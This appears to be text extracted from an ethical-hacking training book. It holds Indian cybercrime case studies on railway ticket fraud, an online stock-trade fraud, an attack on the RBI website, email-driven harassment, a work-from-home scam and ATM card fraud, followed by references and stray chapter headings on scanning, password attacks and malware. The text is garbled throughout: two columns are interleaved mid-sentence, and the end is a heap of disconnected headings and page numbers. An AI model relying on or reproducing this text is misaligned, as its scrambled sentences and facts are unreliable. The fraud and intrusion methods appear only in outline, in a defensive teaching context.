However, IO was unsuccessful in obtaining the IP address of the perpetrators
computer system as his system was protected by a firewall. Subsequently,
the IO posted a mobile number, pretending to be a young girl wanting to make Sections of Law 420 IPC
friends. The same day, the perpetrator contacted the investigating officer on
his mobile phone. Accordingly, the investigating officer was able to identify
the perpetrators mobile number. Background:
The investigating officer obtained call details of the perpetrators number from An online railway ticket service provider lodged a complaint that some un-
the cellular service provider and observed that the most frequent incoming known people had used the Internet ticket booking facility to book 44 railway
and outgoing calls were from two other mobile numbers. The investigating tickets using the stolen credit card details. The department received charge-
officer also obtained the IMEI addresses for these numbers from the mobile back from the credit card companies for all the 44 transactions causing huge
service provider. financial losses.
The investigating officer sent out letters to the Website on which the obscene
Investigation:
profile of the complainant had been hosted to obtain details of the date, time
of the profile creation, the IP address used for the creation, the access details The investigation of the case revealed that the accused had booked more than
for the profile and any other details that the Website would be able to provide 44 tickets in the name of different persons through the departments Website
regarding the profile and the e-mail ID. and managed to get it delivered at different locations in Mumbai. The security
of the IP addresses used for booking the tickets, analysis of the different plac-
The investigating officer then contacted the outlet from where the mobile con-
es where tickets were delivered and the user-IDs created on the Web led to the
nection had been purchased and learnt that one of the SIM cards used was a
arrest of the accused. In all three cases user-IDs created by the accused on
demo card which had been issued to a dealership. Upon further investigation
the Website were recovered.

During the course of the investigation, passwords to all user-IDs created by - Date - Buy Client Name/Address
the accused were obtained and the contents of the user accounts were recov- - Trade Number - Sell Member Code
ered. Details of stolen credit cards of various banks were also recovered from
the accused during the arrest. - Trade Time - Sell Trading Member Name
- Trade Quantity - Sell Client Code/Name/Address
The investigation of this case was completed within nine months of its regis- - Buy Time - Buy Order Number
tration.
- Buy Name - Sell Order Number
Source: - http://indiacyberlab.in/know_more/legal-hacking.htm - Buy Client Code
The complainants client was examined who stated that they had not executed
this trade. The data of the computer installed at their premises was scruti-
nized for system error log, access log, event log and broadcast server log. The
20. ONLINE STOCK EXCHANGE FRAUD analysis of the logs revealed that the computer system of the client was not
logged during the days when the fraudulent trades were executed. The con-
Case: Online stock exchange fraud figuration indicated that for executing the transaction through the internet,
access to the network was imperative. Such access was authorized by the
firewall installed at the network of the complainant.
State: Delhi
The firewall (which generated the log details) provided the IP address used to
logon to the system to execute the transaction. The firewall details as well as
City: New Delhi the server of the complainant were taken to the police computer lab and ana-
lyzed using forensic tools. The transactions logs could not be recovered from
the firewall server as the same was designed to be emailed to a specific email
Sections of Law 420/120B IPC
ID. However, the information collected from a securities firm revealed the de-
tails of an account through which the fraudulent transaction was executed.
Background:
The ownership details and logs for the email ID were collected from a web host
company and were found to be belonging to the very person who had designed
A complaint was received from the director of a securities firm stating that
the firewall for the complainant company. Thereafter, the mobile phone de-
there was an unauthorized execution of a call option resulting in a loss to the
tails of the accused were collected which revealed that he was in contact with
complainant. The complainant company was dealing in sales and purchase of
the co-accused (the person who had designed the firewall for the complainant
shares on behalf of clients. As a broker of the stock exchange they were pro-
company). This gave the first indication that a conspiracy existed between the
viding trading facilities of the equity and futures and options markets to their
accused persons.
sub-brokers/high net worth individual clients. This was done at the clients
premises through ISDN lines/normal telephone lines/ VPN with predefined Based on this information, simultaneous raids were conducted and the ac-
passwords and user IDs on their trading terminals. As per the complaint, a cused were arrested. The interrogation of the accused revealed the modus
fraudulent trade was executed by selling a call option by using the user ID operandi on how the fraudulent transaction had been executed. The accused
and password provided to one of the complainants client. An interesting as- had provided the copy of the program (which had access, firewall file, pass-
pect was that this call option was the most inactive for trading purposes and word and other details that were required for configuring the computer sys-
no trade had taken place except for the fraudulent trade. tem) to the co-accused.
The said call option was compulsorily exercised by the exchange thus result- The Central Processing Unit was configured by the co-accused and the same
ing in a loss of INR 0.05 million to the complainant and wrongful gain to the was taken to cyber caf and on the pretext of downloading software. The ac-
culprits. cused downloaded the software from the attachment in his e-mail account
and executed the transaction by installing the software on the computer.
Investigation: The stock exchange provided the details of the trade log for
call option of buyer and seller. The user ID that was used to book the order Source: - http://indiacyberlab.in/know_more/legal-hacking.htm
could be traced from the information provided. Some of the information that
was provided was: 21. Hacking website

Case: Hacking attempt on RBI website pulling it down for a day 22. SEXUAL HARASSMENT
State: Maharashtra
Case: Sexual harassment
City: Mumbai
State: West Bengal
Sections of Law:
Background: City: Kolkata

The Reserve Bank said there was an attempt to hack its website rendering it
inaccessible for almost the entire day on 25th may 2012. The hacker tried en- Sections of Law 419/501/507/509 IPC and 67 IT Act 2000.
tering the website from a single Internet protocol address multiple times, Due
to multiple requests received from the hackers IP address; genuine entrants Background:
were unable to access the RBI website--www.rbi.org.in. There was no loss of
information or defacing as the hackers could not get into the site. A lady (the complainant) lodged a complaint that she was being harassed by
a flood of telephone calls from unknown men with sexual intention at all odd
The RBI brass, including Governor D Subbarao and all the deputy governors, hours and from various places around the world. As she was a working lady,
were in Mussorie, Uttarakhand for the board meeting when the hacking at- most of the calls were received by her aged in-laws. When she had her tele-
tempt was reported. Further details like the exact time period when the hack- phone number changed and requested the new number to be kept private,
ing happened and the geographical location where the attack has been traced her neighbors started receiving the same kind of calls asking for her by name.
to, are unclear. This was thoroughly harassing her aged in-laws, her husband and also her
neighbors. Some men also visited the house, seeking her by name.
Investigation: It was a DNS (Domain Name System) attack. DNS is the es-
sential protocol to resolve website name to IP address. Hacker tried entering Investigation:
the website from a single Internet protocol address multiple times, jamming
its bandwidth, an RBI spokesperson give information. A caller ID was installed at the house of the complainant and a few of the local
callers were interrogated. During interrogation it was found that the callers
They found the IP address and blocked it and got the website on its feet again. had obtained her e-mail ID in one of the chat rooms. All those who sent the
There was no loss of information or defacing as the hackers could not get mail to her got an auto response giving her telephone number and urging
into the site. Regarding the incident RBI didnt register any complaint against them to call during office hours on working days as her husband is away
hacker to cyber cell. during those hours. On receiving such e-mails, these people contacted her on
the phone numbers given in the e-mail.
Source: PTI Business News Published: Saturday, May 26, 2012, 0:00 [IST]
The police obtained a copy of the e-mail from a few callers. As this mail was
auto generated, the originating IP of the mail only pointed to the Website
server. Interaction in the chat room was the only time when the accused
was directly talking to the different users of the chat room. The complainant
was advised to change her telephone number and get an unlisted telephone
number. Once she got her residence telephone number disconnected her
neighbors started getting calls from different callers asking them to call the
complainant.
Police requested for IP addresses of the e-mail IDs from the Website hosting
company. In addition, they asked for IP logs and registration profiles of the
respective e-mail IDs. The logs revealed the service provider (ISP), who sub-
sequently provided the telephone number and address of the user.
However, this did not lead to a particular person or a group of people, as the
user was a company. Enquiries revealed that the accused was using the

complainant companys internet. On detailed analysis of the logs of the proxy with their company for which they charged the registration fees . 4,000/-
server, three suspected nodes were put under surveillance and a copy was which was later increased to . 6,000/-.
made of all IP packets sent from these nodes. These three nodes belonged to
three senior officers of the company. The company CMD, Mr. Raj promised the people so registered that they would
be provided with the data conversion job which would enable them to earn
When the accused used the e-mail ID, it was traced through the ISP. The 15,000/- per month. The company then collected huge amount from the
ISP provided the details of the IP and addresses/information connected to it. gullible computer users. Some of the users were provided with the job work
Raids were conducted at the residential address of the accused. It was found whereas others were not even provided the job work (data conversion job) as-
that on the two computers temporary files (of the accused) had been deleted. sured to them.
However, using forensic software, few of these deleted files could be re-creat-
ed. The PC of the accused also had incriminating evidence against him. He The people who were provided with the job work, did work day and night on
confessed to his guilt and was arrested. their computers to complete the job work within the stipulated time period
and submitted the job work to the said company. But even after repeated
During investigation it was learnt that the complainant was employed as a correspondence with the company, they were not paid the money by Sohonet
temporary executive engineer in the same company with the accused. The Company. The total number of persons who have been duped by the Sohonet
accused felt that though she was junior to him, she was not giving him proper is about 18,000 and are located at various places in the country, whereas the
respect. He started sending auto generated e-mails in her name, giving her company has paid only to about 1200 people for the work they have done for
telephone numbers and asking males to contact her during office hours. the company whereas others were either not provided with the work or were
not paid for the work. By this way, Sohonet amassed a huge amount which
Source: - http://indiacyberlab.in/know_more/legal-hacking.htm may run into couple of crores.
Investigation: A complaint was filed at Kalachowky Police Station vide C.R.

No. 151/2003 u/sec 406, 420 r/w 120(b) IPC and office of Sohonet India Pvt.
Ltd. located at Dr. Radhakrishnan Salai, Maylapore, Chennai was raided. The
23. ONLINE FRAUD accused Sripathi Guruprasanna Raj, who is the CMD of the company was
arrested by the team of officers comprising P.I. Chinchalkar, A.P.I.Mohite, Po-
Case: Work at Home Scams Exposed lice Constables Rane and Ghadigaokar and is ramanded to police custody till
10.02.2004. Innocent people who are victimized by Sohonet India Pvt. Ltd. are
requested to come forward with their complaints at the office of Cyber Crime
State: Maharashtra Investigation Cell of Crime Branch, C.I.D.,Mumbai. . The investigation of this
case was carried out under the able guidance of Dr. Satya P.al Singh, Jt.C.P.
(Crime) and Dr. Pradnya Saravade, D.C.P. (Enforcement) by A.P.I. Mohite.Cy-
City: Mumbai ber Crime Cell of Crime Branch, C.I.D., Mumbai Police have arrested a person
by name Sripathi Guruprasanna Raj, aged 52 yrs. who is the Chairman and
Sections of Law: 406, 420 r/w 120(b) IPC Managing Director of Sohonet India Private Ltd., a company based in Chen-
nai.
Background: Source: - http://www.indiaforensic.com/cyberextortion.htm
Many complainants based in Mumbai had complained to the Cyber Crime In-
vestigation Cell, that the said company has duped them each for 6,000/- by
promising them with monthly income of 15,000/-.
They said company through its website having URL www.sohonetindia.com

and through various attractive advertisements in the newspapers as well as
by holding seminars in five star hotels, in various metropolitan cities like
Mumbai, Delhi, Kolkata, Bangalore etc. had lured the various computer lit-
erate people with attractive schemes named Instant Treasure Pack (ITP) and
Green Channel. The company then asked the interested people to register

24. ATM CARD FRAUD Investigation:
On receipt of large-scale complaints from the billed credit card users and
Case: Indias First ATM Card Fraud
banks in the United States, the FBI started an investigation into the affair and
also alerted the CBI in New Delhi that the international gang had developed
State: Tamil-Nadu some links in India too.
Deepak Prem Manwani (22), who was caught red-handed while breaking into
City: CHENNAI an ATM in the city in June 2012, it is reliably learnt. The dimensions of the
city cops achievement can be gauged from the fact that they have netted a
man who is on the wanted list of the formidable FBI of the United States.
Background:
At the time of his detention, he had with him 7.5 lakhs knocked off from two
The Chennai City Police busted an international gang involved in cybercrime, ATMs in T Nagar and Abiramipuram in the city. Prior to that, he had walked
with the arrest of Deepak Prem Manwani (22). away with 50,000 from an ATM in Mumbai.
Manwani is a MBA drop-out from a Pune college and served as a marketing While investigating Manwanis case, the police stumbled upon a cyber-crime
executive in a Chennai-based firm for some time. Interestingly, his audacious involving scores of persons across the globe. Manwani has since been en-
crime career started in an Internet cafe. While browsing the Net one day, he larged on bail after interrogation by the CBI. But the city police believe that
got attracted to a site which offered him assistance in breaking into the ATMs. this is the beginning of the end of a major cyber-crime.
His contacts, sitting somewhere in Europe, were ready to give him credit card
numbers of a few American banks for $5 per card. The site also offered the
magnetic codes of those cards, but charged $200 per code.
The operators of the site had devised a fascinating idea to get the personal
identification number (PIN) of the card users. They floated a new site which
resembled that of a reputed telecom companies. That company has millions
of subscribers. The fake site offered the visitors to return $11.75 per head
which, the site promoters said, had been collected in excess by mistake from
them.
Believing that it was a genuine offer from the telecom company in question,
several lakhs subscribers logged on to the site to get back that little money,
but in the process parted with their PINs.
Armed with all requisite data to hack the bank ATMs, the gang started its
systematic looting. Apparently, Manwani and many others of his ilk entered
into a deal with the gang behind the site and could purchase any amount of
data, of course on certain terms or simply enter into a deal on a booty-sharing
basis.
Meanwhile, Manwani also managed to generate 30 plastic cards that con-

tained necessary data to enable him to break into ATMS. He was so enterpris-
ing that he was able to sell away a few such cards to his contacts in Mumbai.
The police are on the lookout for those persons too.

References
Book: CEH Prep Guide: The Comprehensive Guide to Certified Ethical

Hackingby Krutz, Ronald L.Vines, Russell Dean
Book: CEH: Certified Ethical Hacker Study Guide byGraves, Kimberly Hackers are becoming more sophisticated
in conjuring up new ways to hijack
ahmedccna.blogspot.com
your system by exploiting technical
www.archive.org
vulnerabilities or human nature. Dont
en.wikipedia.org/wiki/Google_Earth become the next victim of unscrupulous
www.samspade.org cyberspace intruders.
www.nmap.org
Bradley, Tony. Essential Computer Security. Kevin Mitnick
What They Wont Tell You about the Internet: by Wang, Wallace
http://wiki.ggc.edu/
https://en.wikipedia.org
http://www.cloudbric.com
CEH Certified Ethical Hacker Study Guide by Graves, Kimberly
http://www.imperva.com/Resources/Glossary?term=cross_site_
scripting
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20
Scripting
http://www.iss.net/security_center/advice/Underground/Hacking/
Methods/Technical/Packet_sniffing/default.htm
www.techopedia.com/definition/27471/address-resolution-proto-
col-poisoning-arp-poisoning
ttps://www.concise-courses.com/security/top-ten-pentesting-tools/
http://yewchuan.wordpress.com
http://www.spamlaws.com
http://insecure.org/stf/secnet_ids/secnet_ids.html
http://johncrackernet.blogspot.in/2007/01/intrusion-detection-sys-
tem-ids-evasion.
http://www.indiaforensic.com/atmfraud.htm

Ethical Hacking

Diunggah oleh

Informasi Dokumen

Hak Cipta

Format Tersedia

Bagikan dokumen Ini

Bagikan atau Tanam Dokumen

Opsi Berbagi

Apakah menurut Anda dokumen ini bermanfaat?

Apakah konten ini tidak pantas?

Hak Cipta:

Format Tersedia

Ethical Hacking

Diunggah oleh

Hak Cipta:

Format Tersedia

www.iqspl.

1.1 Ethical Hacking Definition

Ethical Hacking andethical hackerare terms used to describehackingper-

1.2 Types of Hackers

Hackers can be divided into three groups:

Skills needed by an Ethical Hacker

Statistics of various attacks on Internet in 2014

Kali Linux Installation:

Kali 1.0.9 25th August 2014 BugFix Releaseincluding installer and

1. To start your installation, boot with your chosen installation medium.

6. Next, set your time zone. 8. Select the disk to be partitioned.

Step - 2 Installing Backtrack 5

Step 12 Type startx to enter the GUI desktop.

Step 10 After it is finished, restart your system.

3.1 Overview of Identification and Authentication Access Control

There are three factors that can be used for authentication:

Something only known to the user, such as a password or PIN

Something that is part of the user, such as a fingerprint, retina scan or

Something that belongs to the user, such as a card or a key

3.2 Authorization and accountability

For computer security, access control includes the authorization, authentica-

How does IDS work?

Site-to-site IPSec VPN tunnel

Similarly, the layered approach to defence in depth recommends controls be

3.6 Load Balancing

Network blocks 2. Using google earth or maps

Passive and Active Reconnaissance

Scanning Type Purpose

Network scanning IP addresses

Identifying Active Machines

Ping statistics for 192.168.0.1: Ping Tools

Minimum = 1ms, Maximum = 2ms, Average = 1ms WS_PingProPack (www.ipswitch.com)

Nmap Ping sweeps

For example, a port-scanning tool that identifies port 80 as open indicates a

Ports have three states: open, closed and filtered:

List TCP Communication Flag Types

IDLE: An IDLE scan uses a spoofed IP address to send a SYN packet to a

War Driving and War Walking

SNMP Enumeration Tools

Set your firewall or router to deny all unauthorized inbound connec-

Another tool, eBlaster (www.eblaster.com), records the targets computer ac-

Dictionary Attack Rainbow Attack

Hide registry entries

c:\auditpol \\10.1.1.13 /enable

Countermeasures Other vulnerability countermeasures you should consider are:

Whack-a-Mole TCP 12361 and 12362

100 | www.iqspl.com www.iqspl.com | 101

102 | www.iqspl.com www.iqspl.com | 103

104 | www.iqspl.com www.iqspl.com | 105

Adware or advertising-supported software, is any software package that auto-

106 | www.iqspl.com www.iqspl.com | 107

108 | www.iqspl.com www.iqspl.com | 109

Bombs usually refer to malware with a distinctly damaging intent. Logic

110 | www.iqspl.com www.iqspl.com | 111

112 | www.iqspl.com www.iqspl.com | 113

114 | www.iqspl.com www.iqspl.com | 115

The master is the attack launcher. A slave is a host that is compromised by

116 | www.iqspl.com www.iqspl.com | 117

II. SMURF ATTACK

118 | www.iqspl.com www.iqspl.com | 119

120 | www.iqspl.com www.iqspl.com | 121

122 | www.iqspl.com www.iqspl.com | 123

124 | www.iqspl.com www.iqspl.com | 125

Here is a brief illustration of the above-mentioned attack: